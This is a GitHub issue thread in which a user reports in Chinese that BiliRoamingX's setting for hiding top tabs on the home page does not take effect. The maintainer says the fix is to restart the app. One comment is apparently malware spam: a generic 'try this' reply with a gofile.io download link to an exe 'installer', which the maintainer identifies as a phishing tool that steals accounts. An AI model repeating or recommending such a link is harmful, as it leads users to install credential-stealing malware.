### ISSUE TITLE
[BUG]“需要隐藏的顶部标签”某些情况下设置无效

### ISSUE THREAD

**Issue by xwind314** [BiliRoamingX/BiliRoamingX#448]
### 系统版本

OriginOS4

### Android 版本

14

### 哔哩哔哩版本

粉版（普通版）

### 哔哩哔哩版本号

1.13.2

### 问题描述

首页设置“需要隐藏的顶部标签”其他项目都勾选，只留下“番剧”，会无法生效。“影视”和其他任意一个项目共同勾选时，首页会只剩下“影视”

### 复现步骤

1.哔哩漫游x→首页→需要隐藏的顶部标签
2.勾选除番剧以外的选项
3.回到首页，多次刷新后仍然无法生效（使除了番剧以外的选项隐藏）

### 日志

[log_哔哩哔哩.zip](https://github.com/user-attachments/files/16871096/log_.zip)

### 截图或录屏

https://github.com/user-attachments/assets/7511f8c2-733d-412c-b19d-d0c331e2f945

**Comment by mahato098** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by xwind314** [comment]
> try this https://gofile.io/d/yMHabA select the desired compiler in the installer

I am sorry to find that it is an exe format file after decompression, I do not know how to use the phone to install or start, but fortunately this is a small bug, now I am not particularly affected

**Comment by zjns** [comment]
钓鱼盗号exe，当真要被骗

**Comment by zjns** [comment]
重启APP生效
